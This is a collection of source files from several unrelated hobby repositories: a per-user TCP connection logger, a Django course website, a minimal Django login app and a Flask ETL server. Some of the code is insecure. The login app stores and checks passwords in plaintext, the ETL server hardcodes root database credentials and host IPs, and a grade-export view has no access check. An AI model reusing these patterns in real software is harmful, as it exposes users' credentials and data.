for filename in sys.argv[1:]:
try:
with open(filename, "rb") as fp:
sum, blocks = compute_sum(fp.read())
print(format_sum(sum, blocks), filename)
except Exception as e:
print(e)
else:
sum, blocks = compute_sum(sys.stdin.buffer.read())
print(format_sum(sum, blocks))
|
[
"/attack.py",
"/backwards.py",
"/sum.py"
] |
00mjk/tcplogger
|
"""Class for cache of UIDs"""
import json
import subprocess as sp
import sys
ID = "/bin/id"
class UserIDs(object):
"""Interface for handling the cache"""
def __init__(self, ids=None, name=None):
self.ids = ids if ids is not None else {}
def load(self, cache):
"""Attemtps to load preexisting cache"""
self.name = cache
try:
cache = open(cache)
self.ids = json.load(cache)
except:
pass
def access(self, user):
"""Access information in cache"""
return self.ids[user]
def add(self, user, uid):
"""Adds user and uid to cache"""
self.ids[user] = uid
self.ids[uid] = user
def have(self, user):
"""Check if user's information is in cache"""
return user in self.ids
def remove(self, user):
"""Remove user and uid from cache"""
try:
del self.ids[self.ids[user]]
del self.ids[user]
return 0
except KeyError:
return 1
def clear(self):
"""Clear cache"""
self.ids.clear()
def resolve(self, user, pslines, unknowns):
"""Resolves finding unknown UIDs"""
try:
return sp.check_output([ID, "-u", user], stderr=sys.stderr).rstrip()
except sp.CalledProcessError:
try:
for line in pslines:
if line.strip().split()[0] == user:
search = line[65:]
found = search.find("sshd: ")
if found != -1:
return search[6:13]
unknowns.add(user)
return None
except sp.CalledProcessError:
unknowns.add(user)
return None
def close(self):
"""Safely closes and saves cache"""
id_json = json.dumps(self.ids)
json_file = open(self.name, "w")
json_file.write(id_json)
json_file.close()
--- FILE SEPARATOR ---
#!/usr/bin/env python
"""Logger for TCP connections by user"""
import argparse
import csv
import random
import subprocess as sp
import sys
import tempfile
import time
from ids import UserIDs
CAT = "/bin/cat"
ID = "/bin/id"
PS = "/bin/ps"
HEADER = ['time', 'user', 'pid', 'uid', 'proc', 'act']
parser = argparse.ArgumentParser(description='Unix-like TCP Logger')
parser.add_argument("-f", "--filename", nargs='?', const='_', default='_',
metavar="filename", help="Writes to specified filename")
parser.add_argument("-c", "--cache", nargs=1, metavar="cachefile",
help="Loads from specified cache")
parser.add_argument("-C", "--clear", action='store_true', help="Clears cache")
args = parser.parse_args()
mapped = UserIDs()
unknowns = set()
# Tries to open cache, and creates one if it doesn't already exist
if args.cache:
mapped.load(args.cache[0])
if args.filename == "_":
temp = tempfile.NamedTemporaryFile()
filename = temp.name
else:
filename = args.filename
# Creates csv file
with open(filename, 'w') as csv_file:
if args.filename == "_":
csv_file = sys.stdout
writer = csv.DictWriter(csv_file, fieldnames=HEADER)
writer.writeheader()
try:
while True:
# Saves a snapshot of TCP and UID information
ps = sp.check_output([PS, "aux"])
tcp = sp.check_output([CAT, "/proc/net/tcp"])
snap = time.time()
# Cleans the data
pslines = ps.splitlines()
tcplines = tcp.splitlines()
user = random.choice(pslines).strip().split()
# Ignores noise
while user[0] == "root" or user[0] == "USER" or user[0] == "libstor+":
user = random.choice(pslines).strip().split()
length = len(user)
if length > 11:
proc = ''.join(user[10:length])
else:
proc = user[10]
pid = user[1]
user = user[0]
# Relies on cache first for finding user information
if mapped.have(user):
uid = mapped.access(user)
# Ignores username or uid if misconfigured
elif user in unknowns:
continue
# Attempts to figure out username and uid
else:
uid = mapped.resolve(user, pslines, unknowns)
if uid is None:
continue
mapped.add(user, uid)
# Checks and corrects uid misconfiguration from ps table
if user.isdigit():
user, uid = mapped.access(user), mapped.access(uid)
# Finds all of a given user's active TCP connections
acts = []
for line in tcplines:
if line.strip().split()[7] == uid:
acts.append(line)
# Randomly assigns TCP connection to process
if acts:
act = random.choice(acts).rstrip()
if act:
writer.writerow({'time': snap, 'user': user, 'pid': pid,
'uid': uid, 'proc': proc, 'act': act})
# Actions to be executed upon shutdown
except KeyboardInterrupt:
if args.filename == "_":
temp.close()
if args.cache:
if args.clear:
mapped.clear()
mapped.close()
--- FILE SEPARATOR ---
#!/usr/bin/env python
"""Offline cache editor"""
import argparse
from ids import UserIDs
parser = argparse.ArgumentParser(description='Offline cache editor')
parser.add_argument("cache", help="Required cache file")
parser.add_argument("-a", "--add", nargs=2, metavar=('username', 'uid'),
help="Adds specified username and uid to cache")
parser.add_argument("-d", "--delete", nargs=1, metavar='username|uid',
help="Deletes specified username or uid from cache")
parser.add_argument("-C", "--clear", action='store_true', help="Clears all cache")
args = parser.parse_args()
mapped = UserIDs()
mapped.load(args.cache)
code = 0
# Add specified username and uid to cache
if args.add:
user, uid = args.add[0], args.add[1]
# Deletes specified username or uid from cache
if args.delete:
user = args.delete[0]
if mapped.have(user):
code = mapped.remove(user)
else:
code = 1
#Clears all cache
if args.clear:
mapped.clear()
mapped.close()
exit(code)
|
[
"/ids.py",
"/log.py",
"/offline.py"
] |
00mohamad00/CourseWebsite-Django
|
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.forms import ModelForm
from .models import Account
class SignUpForm(UserCreationForm):
email = forms.EmailField(max_length=254, help_text='Required. Inform a valid email address.')
class Meta:
model = Account
fields = ('username', 'email', 'password1', 'password2', 'first_name', 'last_name','student_id')
class LoginForm(forms.Form):
username = forms.CharField()
password = forms.CharField(widget=forms.PasswordInput)
--- FILE SEPARATOR ---
from django.contrib.auth.models import AbstractUser
from django.db import models
class Account(AbstractUser):
student_id = models.IntegerField(blank=True, null=True, verbose_name='شماره دانشجویی') # TODO: set validator
--- FILE SEPARATOR ---
from django.urls import path
from .views import logout_account, LoginAccount, SignUpView, ChaneID
urlpatterns = [
path('login/', LoginAccount.as_view(), name='login'),
path('signup/', SignUpView.as_view(), name='signup'),
path('logout/', logout_account, name='logout'),
path('id/', ChaneID.as_view(), name='change_id'),
]
--- FILE SEPARATOR ---
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import Http404
from django.shortcuts import render, redirect
from django.urls import reverse_lazy
from django.views.generic import CreateView, UpdateView
from .models import Account
from .forms import SignUpForm, LoginForm
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib.auth.views import LoginView
class LoginAccount(SuccessMessageMixin, LoginView):
template_name = 'accountPanel/login.html'
success_message = 'Welcome to your profile'
class SignUpView(SuccessMessageMixin, CreateView):
template_name = 'accountPanel/signup.html'
success_url = reverse_lazy('login')
form_class = SignUpForm
success_message = "Your profile was created successfully"
class ChaneID(LoginRequiredMixin, UpdateView):
model = Account
fields = ['student_id']
template_name = 'accountPanel/student_id.html'
success_url = reverse_lazy('index')
def get_object(self, queryset=None):
return self.request.user
def logout_account(request):
if request.user.is_authenticated:
logout(request)
return redirect('login')
--- FILE SEPARATOR ---
from django.db import models
from account.models import Account
class Notification(models.Model):
title = models.CharField(max_length=128)
text = models.TextField(max_length=512)
person = models.ForeignKey(Account,on_delete=models.CASCADE)
def __str__(self):
return self.title + ' ' + self.person.get_full_name()
--- FILE SEPARATOR ---
from django.shortcuts import render
from account.models import Account
from .models import Notification
def create_notification(person: Account, title: str, text: str):
notification = Notification(person=person, title=title, text=text)
notification.save()
def create_notification_for_many(persons, title: str, text: str):
for person in persons:
notification = Notification(person=person, title=title, text=text)
notification.save()
--- FILE SEPARATOR ---
from django.contrib import admin
from .models import Course, CourseContent, HomeWork, Answer
# Register your models here.
admin.site.register(Course)
admin.site.register(CourseContent)
admin.site.register(HomeWork)
admin.site.register(Answer)
--- FILE SEPARATOR ---
import csv
from django.http import HttpResponse
from .models import Answer
def download_csv(objects):
response = HttpResponse(content_type='text/csv')
# force download.
response['Content-Disposition'] = 'attachment;filename=export.csv'
# the csv writer
writer = csv.writer(response)
writer.writerow(['شماره دانشجویی', 'نام و نام خانوادگی', 'تاریخ ارسال', 'نمره'])
for obj in objects:
writer.writerow([obj.student.student_id, obj.student.get_full_name(), str(obj.submitted_date), obj.score])
return response
--- FILE SEPARATOR ---
from datetime import datetime
from notification.views import create_notification_for_many
from notification.models import Notification
from django.utils import timezone
from django.http import Http404, HttpResponseRedirect
from django.shortcuts import get_object_or_404
from .models import Course, HomeWork
class NotificationMixin():
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['notifications'] = Notification.objects.filter(person=self.request.user).all()
return context
class AccessMixin():
def dispatch(self, request, pk, *args, **kwargs):
course = get_object_or_404(Course, pk=pk)
if course.teacher != request.user:
raise Http404
return super().dispatch(request)
class AccessStudentMixin():
def dispatch(self, request, pk, *args, **kwargs):
course = get_object_or_404(Course, pk=pk)
if request.user not in course.students.all():
raise Http404
return super().dispatch(request)
class CourseValidMixin():
def form_valid(self, form):
self.obj = form.save(commit=False)
self.obj.teacher = self.request.user
response = super().form_valid(form)
return response
class FormValidMixin():
def form_valid(self, form):
course = get_object_or_404(Course, pk=self.kwargs['pk'])
self.obj = form.save(commit=False)
self.obj.course = course
self.obj.save()
create_notification_for_many(course.students.all(), title='تمرین جدید', text=self.obj.name)
return HttpResponseRedirect(self.obj.get_absolute_url())
class AnswerValidMixin():
def form_valid(self, form):
homework = get_object_or_404(HomeWork, pk=self.kwargs['pk2'])
if homework.deadline_date < timezone.now():
raise Http404
file = form.cleaned_data['answer']
if 'pdf' not in file.content_type:
raise Http404
self.obj = form.save(commit=False)
self.obj.submitted_date = timezone.now()
self.obj.score = None
response = super().form_valid(form)
return response
class VideoValidMixin():
def form_valid(self, form):
video = form.cleaned_data['file']
if 'video' not in video.content_type:
raise Http404
course = get_object_or_404(Course, pk=self.kwargs['pk'])
self.obj = form.save(commit=False)
self.obj.course = course
return super().form_valid(form)
--- FILE SEPARATOR ---
from django.urls import reverse
from django.utils import timezone
from django.db import models
from django.utils.html import strip_tags
from account.models import Account
class Course(models.Model):
title = models.CharField(max_length=50, blank=False , verbose_name='عنوان کلاس')
description = models.TextField(blank=True, verbose_name='توضیحات')
teacher = models.ForeignKey(Account, on_delete=models.CASCADE) # TODO: set validator
students = models.ManyToManyField(Account, related_name='%(class)s_requests_created')
def get_absolute_url(self):
return reverse('course_as_teacher', kwargs={'pk': self.pk})
def __str__(self):
return self.title
class CourseContent(models.Model):
course = models.ForeignKey(Course, on_delete=models.CASCADE)
description = models.TextField(blank=True, verbose_name='توضیحات')
file = models.FileField(upload_to='CourseContents', verbose_name='فایل') # TODO: need to check
published_date = models.DateTimeField(default=timezone.now, editable=True)
def get_absolute_url(self):
return reverse('course_as_teacher', kwargs={'pk': self.course.pk})
def __str__(self):
return self.course.title + '٬ ' + strip_tags(self.description)
class HomeWork(models.Model):
course = models.ForeignKey(Course, on_delete=models.CASCADE, verbose_name='درس')
name = models.CharField(max_length=50, blank=False, verbose_name='نام')
description = models.TextField(blank=True, verbose_name='توضیحات')
published_date = models.DateTimeField(auto_now_add=True)
deadline_date = models.DateTimeField(blank=False, null=False, verbose_name='آخرین مهلت ارسال')
def get_absolute_url(self):
return reverse('course_as_teacher', kwargs={'pk': self.course.pk})
def __str__(self):
return self.name
class Answer(models.Model):
answer = models.FileField(upload_to='Answers', null=True, blank=True) # TODO: need to check
student = models.ForeignKey(Account, on_delete=models.CASCADE)
home_work = models.ForeignKey(HomeWork, on_delete=models.CASCADE)
submitted_date = models.DateTimeField(null=True, blank=True)
score = models.IntegerField(null=True, blank=True)
def __str__(self):
return self.student.get_full_name() + '_' + self.home_work.name
--- FILE SEPARATOR ---
from django.urls import path
from .views import index, courses, HomeworkCreate, HomeworkUpdate, HomeworkDelete,\
HomeworkAnswers, AnswerScoreUpdate, CourseAsTeacher, ContentCreate, ContentDelete, CourseAsStudnet, HomeworkView,\
AnswerUpdate, CourseCreate, CourseAddStudent, download_csv_view
urlpatterns = [
path('', index, name='index'),
path('courses/', courses, name='courses'),
path('course/add/', CourseCreate.as_view(), name='course_create'),
path('course/t/<int:pk>/students/add/', CourseAddStudent.as_view(), name='course_add_student'),
path('course/t/<int:pk>/', CourseAsTeacher.as_view(), name='course_as_teacher'),
path('course/t/<int:pk>/homework/add/', HomeworkCreate.as_view(), name='homework_create'),
path('course/t/<int:pk>/homework/<int:pk2>/update', HomeworkUpdate.as_view(), name='homework_update'),
path('course/t/<int:pk>/homework/<int:pk2>/delete', HomeworkDelete.as_view(), name='homework_delete'),
path('course/t/<int:pk>/homework/<int:pk2>/answers', HomeworkAnswers.as_view(), name='homework_answers'),
path('course/t/<int:pk>/homework/<int:pk2>/answers/download/', download_csv_view, name='answers_download'),
path('course/t/<int:pk>/homework/<int:pk2>/answers/<int:pk3>/score/change', AnswerScoreUpdate.as_view(), name='homework_answers_update'),
path('course/t/<int:pk>/content/add', ContentCreate.as_view(), name='content_create'),
path('course/t/<int:pk>/content/<int:pk2>/delete', ContentDelete.as_view(), name='content_delete'),
path('course/<int:pk>/', CourseAsStudnet.as_view(), name='course_as_student'),
path('course/<int:pk>/homework/<int:pk2>/', HomeworkView.as_view(), name='homework_view'),
path('course/<int:pk>/homework/<int:pk2>/answer/<int:pk3>/update', AnswerUpdate.as_view(), name='answer_update'),
]
--- FILE SEPARATOR ---
from django.contrib.auth.decorators import login_required
from django.http import Http404, HttpResponse
from django.urls import reverse_lazy
from django.utils import timezone
from django.views.generic import CreateView, UpdateView, DeleteView, ListView, DetailView
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import render, redirect, get_object_or_404
from notification.models import Notification
from .models import Course, HomeWork, Answer, CourseContent
from .mixins import FormValidMixin, AccessMixin, VideoValidMixin, AccessStudentMixin, AnswerValidMixin, CourseValidMixin,\
NotificationMixin
from .functions import download_csv
@login_required
def index(request):
return redirect('courses')
@login_required
def courses(request):
courses_as_teacher = Course.objects.filter(teacher=request.user)
courses_as_student = Course.objects.filter(students=request.user)
notification = Notification.objects.filter(person=request.user).all()
return render(request, 'panel/courses.html', context={'courses_as_teacher': courses_as_teacher,
'courses_as_student': courses_as_student,
'notifications': notification})
class CourseCreate(LoginRequiredMixin, CourseValidMixin, NotificationMixin, CreateView):
model = Course
fields = ['title', 'description']
template_name = 'panel/course_create.html'
class CourseAddStudent(AccessMixin, NotificationMixin, UpdateView):
model = Course
fields = ['students']
template_name = 'panel/course_add_student.html'
def get_success_url(self):
return reverse_lazy('course_as_teacher', kwargs={'pk': self.kwargs['pk']})
class CourseAsStudnet(AccessStudentMixin, NotificationMixin, DetailView):
model = Course
template_name = 'panel/course_student.html'
context_object_name = 'course'
def get_object(self):
course = Course.objects.get(pk=self.kwargs['pk'])
return course
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['homeworks'] = HomeWork.objects.filter(course=self.object).order_by('-published_date').all()
context['contents'] = CourseContent.objects.filter(course=self.object).order_by('published_date').all()
return context
class HomeworkView(AccessStudentMixin, NotificationMixin, DetailView):
model = HomeWork
template_name = 'panel/homework_view.html'
context_object_name = 'homework'
def get_object(self):
return HomeWork.objects.get(pk=self.kwargs['pk2'])
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['course'] = get_object_or_404(Course, pk=self.kwargs['pk'])
context['homework'] = get_object_or_404(HomeWork, pk=self.kwargs['pk2'])
submit_none_answers(context['homework'], context['course'])
context['answer'] = Answer.objects.get(home_work=context['homework'], student=self.request.user)
context['now'] = timezone.now()
return context
class AnswerUpdate(AccessStudentMixin, AnswerValidMixin, NotificationMixin, UpdateView):
model = Answer
fields = ['answer']
def get(self, *args, **kwargs):
return Http404
def get_success_url(self):
return reverse_lazy('homework_view', kwargs={'pk': self.kwargs['pk'], 'pk2': self.kwargs['pk2']})
def get_object(self):
return Answer.objects.get(pk=self.kwargs['pk3'])
class CourseAsTeacher(AccessMixin, NotificationMixin, DetailView):
model = Course
template_name = 'panel/course_teacher.html'
context_object_name = 'course'
def get_object(self):
course = Course.objects.get(pk=self.kwargs['pk'])
return course
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['homeworks'] = HomeWork.objects.filter(course=self.object).order_by('-published_date').all()
context['contents'] = CourseContent.objects.filter(course=self.object).order_by('published_date').all()
return context
class HomeworkCreate(AccessMixin, FormValidMixin, NotificationMixin, CreateView):
model = HomeWork
fields = ['name', 'description', 'deadline_date']
template_name = 'panel/create_change_homework.html'
class HomeworkUpdate(AccessMixin, FormValidMixin, NotificationMixin, UpdateView):
model = HomeWork
fields = ['name', 'description', 'deadline_date']
template_name = 'panel/create_change_homework.html'
def get_object(self):
return HomeWork.objects.get(pk=self.kwargs['pk2'])
class HomeworkDelete(AccessMixin, DeleteView):
model = HomeWork
def get(self, *args, **kwargs):
return Http404
def get_success_url(self):
course_pk = self.kwargs['pk']
return reverse_lazy('course_as_teacher', kwargs={'pk': course_pk})
def get_object(self):
return HomeWork.objects.get(pk=self.kwargs['pk2'])
def submit_none_answers(homework: HomeWork, course: Course):
answers = Answer.objects.filter(home_work=homework).order_by('-submitted_date').all()
students_has_answer = [answer.student for answer in answers]
students = course.students.all()
for student in students:
if student not in students_has_answer:
answer = Answer()
answer.student = student
answer.home_work = homework
answer.submitted_date = None
answer.answer = None
answer.save()
class HomeworkAnswers(AccessMixin, NotificationMixin, ListView):
model = HomeWork
template_name = 'panel/homework_answers.html'
context_object_name = 'answers'
def get_queryset(self):
self.homework = get_object_or_404(HomeWork, pk=self.kwargs['pk2'])
return Answer.objects.filter(home_work=self.homework).order_by('-submitted_date').all()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['course'] = get_object_or_404(Course, pk=self.kwargs['pk'])
context['homework'] = get_object_or_404(HomeWork, pk=self.kwargs['pk2'])
submit_none_answers(context['homework'], context['course'])
return context
class AnswerScoreUpdate(AccessMixin, UpdateView):
model = Answer
fields = ['score']
def get(self, *args, **kwargs):
return Http404
def get_success_url(self):
return reverse_lazy('homework_answers', kwargs={'pk': self.kwargs['pk'], 'pk2': self.kwargs['pk2']})
def get_object(self):
return Answer.objects.get(pk=self.kwargs['pk3'])
class ContentCreate(AccessMixin, VideoValidMixin, NotificationMixin, CreateView):
model = CourseContent
fields = ['description', 'file']
template_name = 'panel/create_change_content.html'
class ContentDelete(AccessMixin, DeleteView):
model = HomeWork
def get(self, *args, **kwargs):
return Http404
def get_success_url(self):
course_pk = self.kwargs['pk']
return reverse_lazy('course_as_teacher', kwargs={'pk': course_pk})
def get_object(self):
return CourseContent.objects.get(pk=self.kwargs['pk2'])
def download_csv_view(request, pk, pk2):
answers = Answer.objects.filter(home_work=pk2).all()
data = download_csv(answers)
return HttpResponse(data, content_type='text/csv')
|
[
"/account/forms.py",
"/account/models.py",
"/account/urls.py",
"/account/views.py",
"/notification/models.py",
"/notification/views.py",
"/panel/admin.py",
"/panel/functions.py",
"/panel/mixins.py",
"/panel/models.py",
"/panel/urls.py",
"/panel/views.py"
] |
00pd00/project2
|
from django.db import models
from django.contrib.auth.models import User
class profile(models.Model):
email=models.EmailField(max_length=20)
password=models.CharField(max_length=20)
def __str__(self):
return self.email
--- FILE SEPARATOR ---
from django.shortcuts import render
from .models import profile
from django.shortcuts import render , HttpResponseRedirect ,redirect,HttpResponse
from django.contrib.auth.models import User , auth
from django.db.models import Exists
from django.contrib.auth.decorators import login_required
def register(request):
if request.method=="POST":
email=request.POST['email']
password=request.POST['password1']
password1=request.POST['password2']
if password == password1:
if profile.objects.filter(email=email).exists():
print("email already used")
else:
var=profile(email=email,password=password)
print("user created")
var.save()
return render(request,"login.html")
else:
print("password doesnt match")
return redirect("register")
obj1=profile.objects.all()
return render(request,"register.html",{'data1':obj1})
def login(request):
if request.method == 'POST':
email1=request.POST['email']
password=request.POST['password']
var=profile.objects.filter(email=email1)
for i in var:
pass1=i.password
em=i.email
if em==email1:
if password==pass1:
request.session['name']=email1
return redirect("index")
print("logged in")
else:
print("password does not match")
return redirect('/')
else:
print("email does not exist")
return redirect('/')
else:
return render(request,"login.html")
def index(request):
return render(request,'index.html')
|
[
"/app2/models.py",
"/app2/views.py"
] |
00pf00/big-data-server
|
import os
import csv
import json
import time
import pandas as pd
import subprocess
import pymysql
from datetime import date
from kafka import KafkaConsumer
from flask import Blueprint, jsonify, request,Flask
from flask_socketio import SocketIO
from db.mysql import mysql
from hdfs.file import file
from etl.data import Data
from etl.data import get_tables_pandas as get_tables
from util.job import job
from util.error import get_error_resp
from util.engine import get_mysql_engine
model_path = '/home/model/'
kafka_servers = ['kafka-service:9092']
mysql_args = {'host':'172.24.32.169', 'user':'root', 'passwd':'root', 'dbname':'BUPT_IOT'}
# if __name__ == '__main__':
# print('mysql+pymysql://%s:%s@%s:3306/%s'%
# (mysql_args['user'], mysql_args['passwd'], mysql_args['host'], mysql_args['dbname']))
--- FILE SEPARATOR ---
import pandas as pd
def get_tables_pandas(engine):
tables = pd.read_sql_query('show tables', engine)
for table_name in [tables.iloc[i, 0] \
for i in range(tables.shape[0])]:
table = {'table_name': table_name}
sql = 'desc %s' % table_name
each_table = pd.read_sql_query(sql, engine)
table['columns'] = [each_table.iloc[j, 0] \
for j in range(each_table.shape[0])]
yield table
class Data():
def __init__(self,
source,
source_engine,
target=None,
target_engine=None,
transform_args=None):
self.transform_args = transform_args
self.source_engine = source_engine
if target_engine is None:
self.target_engine = source_engine
else:
self.target_engine = target_engine
self.source = source
self.target = target
self.df = pd.read_sql(self.source,
self.source_engine)
def filter(self, filter_args):
# if filter_args is None:
# filter_args = self.args.get('filter', [])
for item in filter_args:
func = self.get_filter(item['cmp'], item['value'])
self.df = self.df[func(self.df[item['column']])]
def drop(self, drop_args):
# if drop_args is None:
# drop_args = self.args.get('drop', [])
self.df.drop(drop_args,
axis=1,
inplace=True)
def dropna(self, dropna_args):
# if dropna_args is None:
# dropna_args = self.args.get('dropna', [])
self.df.dropna(subset=dropna_args,
inplace=True)
def fillna(self, fillna_args):
values = {}
mean = self.df.mean()
median = self.df.median()
mode = self.df.mode().iloc[0]
# if fillna_args is None:
# fillna_args = self.args.get('fillna', [])
for item in fillna_args:
column = item['column']
if item['value'] == 'mean':
value = mean[column]
elif item['value'] == 'median':
value = median[column]
elif item['value'] == 'mode':
value = mode[column]
else:
value = item['value']
values[column] = value
self.df.fillna(values,
inplace=True)
def split(self, split_args):
for item in split_args:
tmp = self.df[item['source_column']].str.split(item['split_flag'], expand=True)
rename = {i:item['source_column'] + '_split_' + str(i) for i in tmp.columns}
tmp.rename(columns=rename, inplace=True)
if item.get('drop_source_column', 0) == 1:
self.drop([item['source_column']])
self.df = self.df.join(tmp)
def merge(self, merge_args):
for item in merge_args:
new_column_name = \
'merge_' + '_'.join(item['source_columns'])
new_column_name = item.get('new_column_name', new_column_name)
func = \
self.get_merge(item['source_columns'], item['split_flag'])
self.df[new_column_name] = self.df.apply(func, axis=1)
if item.get('drop_source_columns', 0) == 1:
self.drop(item['source_columns'])
def math_func(self, math_func_args):
for item in math_func_args:
new_column_name = \
item['function'] + '_' + '_'.join(item['source_columns'])
new_column_name = item.get('new_column_name', new_column_name)
func = \
self.get_function(item['source_columns'], item['function'])
self.df[new_column_name] = self.df.apply(func, axis=1)
if item.get('drop_source_columns', 0) == 1:
self.drop(item['source_columns'])
def rename(self, raname_args):
self.df.rename(columns=raname_args, inplace=True)
def transform(self, target=None, target_engine=None, transform_args=None, save=False):
s_l = self.__len__()
if transform_args is None:
transform_args = self.transform_args
for op in transform_args:
op_type = op.get('type', '')
op_args = op.get('args', [])
if op_type == 'drop':
self.drop(op_args)
elif op_type == 'dropna':
self.dropna(op_args)
elif op_type == 'filter':
self.filter(op_args)
elif op_type == 'fillna':
self.fillna(op_args)
elif op_type == 'split':
self.split(op_args)
elif op_type == 'merge':
self.merge(op_args)
elif op_type == 'math':
self.math_func(op_args)
elif op_type == 'rename':
if op_args == []:
op_args = {}
self.rename(op_args)
if target is None:
target = self.target
if target_engine is None:
target_engine = self.target_engine
if save and target is not None and target_engine is not None:
self.save(target, target_engine)
e_l = self.__len__()
return (s_l, e_l)
def save(self, target=None, target_engine=None):
if target is None:
target = self.target
if target_engine is None:
target_engine = self.target_engine
if target is not None and target_engine is not None:
self.df.to_sql(name=target,
con=target_engine,
if_exists='append',
index=False)
def get_merge(self, columns, split_flag):
def _merge(x):
res = \
split_flag.join([str(x[item]) for item in columns])
return res
return _merge
def get_function(self, columns, func):
def _function(x):
l = len(columns)
tmp = [x[item] for item in columns]
if func == 'sum':
return sum(tmp)
if func == 'mean':
return sum(tmp)/l
if func == 'max':
return max(tmp)
if func == 'min':
return min(tmp)
return _function
def get_filter(self, cmp, value):
def _filter(x):
if cmp == '>':
return x > value
if cmp == '<':
return x < value
if cmp == '==':
return x == value
if cmp == '<=':
return x <= value
if cmp == '>=':
return x >= value
if cmp == '!=':
return x != value
if cmp == 'like':
return x.str.contains(value)
return x == x
return _filter
def __len__(self):
return len(self.df.index)
if __name__ == '__main__':
from sqlalchemy import create_engine
engine = create_engine('mysql+pymysql://root:root@172.24.32.169:3306/BUPT_IOT')
data = Data(source='mydf', source_engine=engine)
#data.drop(['index', 'id'])
#data.dropna(['id', 'num'])
data.df = pd.DataFrame({'hah':['109', '1-1'],
'test':['123-456-789', '236-456-455'],
'1':[908, 201],
'2':[None, 755],
'3':[574,7665]})
data.save('test')
# print(data.df)
#
# data.filter([{'column':'test', 'cmp' : 'like', 'value':'-4'},
# {'column': 'test', 'cmp': '==', 'value': '123-456-789'}])
#data.filter([{'column': 'index', 'cmp': '>=', 'value': 3}])
#data.fillna([{'column':'index', 'value':1000}, {'column':'id', 'value':'mean'}])
# data.split([{"source_column":"hah","split_flag":"-","drop_source_column":0},
# {"source_column": "test", "split_flag": "-", "drop_source_column": 1}])
# data.merge([{"source_columns":["hah", "test"],"split_flag":"-","drop_source_columns":0},
# {"source_columns": ["hah", "merge_hah_test"], "split_flag": "-", "drop_source_columns": 1}])
# data.rename({'1':'362846', '3':'34564', '6':'888'})
# data.math_func([{'function': 'mean', 'source_columns':['1','2', '3'], 'new_column_name':'ttsdffds'},
# {'function': 'min', 'source_columns': ['1', '2', '3'], 'drop_source_columns':0}])
data.transform(transform_args=[
{'type':'merge','args':
[{"source_columns":["hah", "test"],"split_flag":"-","drop_source_columns":0},
{"source_columns": ["hah", "merge_hah_test"], "split_flag": "-", "drop_source_columns": 0}]},
{'type':'math','args':
[{'function': 'mean', 'source_columns': ['1', '2', '3'], 'new_column_name': 'ttsdffds'},
{'function': 'min', 'source_columns': ['1', '2', '3'], 'drop_source_columns': 0}]},
{'type': 'split', 'args':
[{"source_column": "hah", "split_flag": "-", "drop_source_column": 0},
{"source_column": "test", "split_flag": "-", "drop_source_column": 1}]}
])
#print(data.save('20180831_09test'))
--- FILE SEPARATOR ---
import pyhdfs
class file():
def __init__(self,hosts = '39.104.186.210',port = '9000',user_name = 'spark'):
self.fs = pyhdfs.HdfsClient(hosts,port,user_name)
def getFiles(self,path,owner,group):
try:
data = []
for x in self.fs.list_status(path):
if x['owner'] == owner and x['group'] == group:
data.append(x)
return data
except Exception as e:
print(e)
def deleteFiles(self, path):
try:
self.fs.delete(path)
status = {"status":"操作成功!","code":"200"}
return status
except Exception as e:
print(e)
status = {"status":"操作失败!","code":"500"}
if __name__ == '__main__':
file = file();
print(file.getFiles("/","spark","supergroup"))
--- FILE SEPARATOR ---
from config import *
model = Blueprint('model', __name__)
@model.route('/get-general-model', methods=['GET', 'POST'])
def get_general_model():
try:
sql_select = "select * from data_model where tenant_id = -1"
data = {}
if request.method == 'GET':
data = request.args
elif request.method == 'POST':
data = request.form
print(data)
if 'modelId' in data:
sql_select = sql_select + " and model_id = %d" % int(data.get('modelId'))
db = mysql(**mysql_args)
res = {'data':[]}
for i, item in enumerate(db.select(sql_select)):
tmp = {}
tmp['model_id'] = item[0]
tmp['model_name'] = item[1]
tmp['model_desc'] = item[2]
tmp['model_input'] = json.loads(item[3])
tmp['model_path'] = item[4]
res['data'].append(tmp)
print(res)
db.close()
resp = jsonify(str(res))
resp.headers['Access-Control-Allow-Origin'] = '*'
return resp
except Exception as e:
print(e)
return get_error_resp(e)
@model.route('/get-tenant-model', methods=['GET', 'POST'])
def get_tenant_model():
try:
data = {}
if request.method == 'GET':
data = request.args
elif request.method == 'POST':
data = request.form
print(data)
assert 'tenantId' in data, 'missing parameters tenant id!'
tenant_id = int(data['tenantId'])
sql_select = "select * from data_model where tenant_id = %d" % tenant_id
if 'modelId' in data:
sql_select = sql_select + " and model_id = %d" % int(data.get('modelId'))
db = mysql(**mysql_args)
res = {'data':[]}
for i, item in enumerate(db.select(sql_select)):
tmp = {}
tmp['model_id'] = item[0]
tmp['model_name'] = item[1]
tmp['model_desc'] = item[2]
tmp['model_input'] = json.loads(item[3])
tmp['model_path'] = item[4]
res['data'].append(tmp)
print(res)
db.close()
resp = jsonify(str(res))
resp.headers['Access-Control-Allow-Origin'] = '*'
return resp
except Exception as e:
print(e)
return get_error_resp(e)
@model.route('/create-model', methods=['GET','POST'])
def create_model():
assert request.method == 'POST', 'method must be post!'
model_id = ''
try:
assert 'model_file' in request.files, 'no model file!'
model_file = request.files['model_file']
data = request.form
assert 'tenantId' in data, 'missing parameters tenant id!'
tenant_id = data['tenantId']
if not os.path.isdir(model_path):
os.makedirs(model_path)
if not os.path.isdir(model_path+'/'+tenant_id):
os.makedirs(model_path+'/'+tenant_id)
model_file_name = model_path+'/'+tenant_id + '/' + model_id + '.pkl'
model_file.save(model_file_name)
except Exception as e:
print(e)
return get_error_resp(e)
@model.route('/delete-model', methods=['GET', 'POST'])
def delete_model():
try:
data = {}
if request.method == 'GET':
data = request.args
elif request.method == 'POST':
data = request.form
print(data)
assert 'tenantId' in data, 'missing parameters tenant id!'
tenant_id = int(data['tenantId'])
assert 'modelId' in data, 'missing parameters model id!'
model_id = int(data['modelId'])
sql_delete = "select * from data_model where tenant_id = %d and model_id = %d" % (tenant_id, model_id)
db = mysql(**mysql_args)
db.delete(sql_delete)
db.close()
resp = jsonify(str({'status': 'delete model success!'}))
resp.headers['Access-Control-Allow-Origin'] = '*'
return resp
except Exception as e:
print(e)
